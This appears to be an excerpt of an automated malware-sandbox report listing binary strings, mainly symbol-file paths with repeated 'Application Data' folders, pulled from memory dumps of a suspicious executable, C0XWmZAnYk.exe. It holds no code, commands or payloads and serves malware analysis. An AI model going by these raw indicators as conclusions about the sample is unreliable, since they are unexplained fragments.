        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_4_2023__16_5_0.txt| source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Xd|I source: C0XWmZAnYk.exe, 00000006.00000003.2380241089.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379563679.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357189135.000000000317E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: C0XWmZAnYk.exe, 00000006.00000003.2665181944.0000000003116000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ome\ source: C0XWmZAnYk.exe, 00000006.00000003.2355657291.0000000003100000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133409023789902202.txt source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\+} source: C0XWmZAnYk.exe, 00000006.00000003.2393020951.0000000003183000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2380241089.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379563679.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570660623.000000000318E000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569168880.000000000318C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601657685.000000000318C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357270354.000000000318D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2381176027.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379729542.0000000003187000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2383467779.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515307388.0000000003187000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357189135.000000000317E000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2382327079.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2665007852.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.rigdd source: C0XWmZAnYk.exe, 00000006.00000003.2569586758.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2588948380.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590807441.00000000033AD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2591021767.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590747868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569291711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2591557050.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: C0XWmZAnYk.exe, 00000006.00000003.2669190451.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.rigd source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\\' source: C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\* source: C0XWmZAnYk.exe, 00000006.00000003.2651413320.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2652949602.0000000003601000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\id-ID\od.pdb\e\&~ source: C0XWmZAnYk.exe, 00000006.00000003.2674038254.0000000003681000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2570696868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590747868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\a\ source: C0XWmZAnYk.exe, 00000006.00000003.2674038254.0000000003681000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: C0XWmZAnYk.exe, 00000006.00000003.2669410253.000000000343F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.rigd*e source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\ source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\4\* source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: C0XWmZAnYk.exe, 00000006.00000003.2590007588.0000000003160000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570214748.000000000315A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: C0XWmZAnYk.exe, 00000006.00000003.2642488194.0000000003379000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641342827.000000000335C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650104372.0000000003370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ef\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: C0XWmZAnYk.exe, 00000006.00000003.2642157736.0000000003313000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641465788.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622184907.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\fup.pdb source: C0XWmZAnYk.exe
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errortory\ source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorCache\AppCache133409024501033688.txt source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2641915161.000000000348F000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622771619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642892348.0000000003498000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: C0XWmZAnYk.exe, 00000006.00000003.2591290732.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601014852.00000000032B4000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600081582.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590477631.00000000032C3000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569323863.00000000032B4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*) source: C0XWmZAnYk.exe, 00000006.00000003.2515902450.000000000315C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*\8 source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393316611.000000000314B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393292141.000000000313D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: C0XWmZAnYk.exe, 00000006.00000003.2642488194.0000000003379000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641342827.000000000335C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650104372.0000000003370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\o source: C0XWmZAnYk.exe, 00000006.00000003.2660383574.0000000003749000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664709026.0000000003756000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2665419996.0000000003775000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\40\ source: C0XWmZAnYk.exe, 00000006.00000003.2381239465.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2651413320.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2652949602.0000000003601000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LbL2 source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2392919853.0000000003336000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393128569.0000000003352000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\" source: C0XWmZAnYk.exe, 00000006.00000003.2672094700.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: +C:\fup.pdb source: C0XWmZAnYk.exe
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p source: C0XWmZAnYk.exe, 00000006.00000003.2652474368.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655232224.0000000003368000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2658887283.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659946840.0000000003364000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660707268.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\be\ source: C0XWmZAnYk.exe, 00000006.00000003.2516054824.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569291711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569964189.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570520442.000000000310A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\r source: C0XWmZAnYk.exe, 00000006.00000003.2652474368.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655232224.0000000003368000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2658887283.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659946840.0000000003364000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660707268.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.erroroo source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ci4 source: C0XWmZAnYk.exe, 00000006.00000003.2622986302.000000000317B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601840070.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622682972.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600734428.0000000003194000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\*<a,.sK source: C0XWmZAnYk.exe, 00000006.00000003.2379525702.0000000003199000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: C0XWmZAnYk.exe, 00000006.00000002.2685366936.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674721242.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2679546118.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674869784.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2680639828.00000000036F8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: C0XWmZAnYk.exe, 00000006.00000003.2600081582.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601014852.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\0<Y@F source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\C source: C0XWmZAnYk.exe, 00000006.00000003.2669190451.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.rigd\ source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\*. source: C0XWmZAnYk.exe, 00000006.00000003.2381239465.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\ source: C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.0000000003651000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654119617.0000000003681000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655075144.0000000003699000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\; source: C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: C0XWmZAnYk.exe, 00000006.00000003.2570839997.0000000003162000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2568971999.0000000003472000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590596113.0000000003464000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590095001.0000000003463000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570214748.000000000315A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\on Data source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*ory\ source: C0XWmZAnYk.exe, 00000006.00000003.2515902450.000000000315C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\C\ source: C0XWmZAnYk.exe, 00000006.00000003.2643623610.000000000341E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\\ source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.rigd\}m source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
